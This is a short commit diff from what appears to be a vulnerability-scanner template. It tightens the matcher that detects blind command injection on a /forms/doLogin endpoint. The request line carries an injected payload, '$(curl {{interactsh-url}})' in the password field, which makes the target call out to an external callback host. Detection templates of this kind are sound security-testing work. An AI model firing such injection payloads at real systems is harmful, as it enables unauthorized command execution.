strict dsl matcher with addition check
parent
0450d1224f
commit
c59974226f
|
@ -29,7 +29,8 @@ http:
|
|||
- "{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
- type: dsl
|
||||
dsl:
|
||||
- contains(interactsh_protocol, 'http')
|
||||
- contains_all(to_lower(interactsh_request), 'user-agent','curl')
|
||||
condition: and
|
Loading…
Reference in New Issue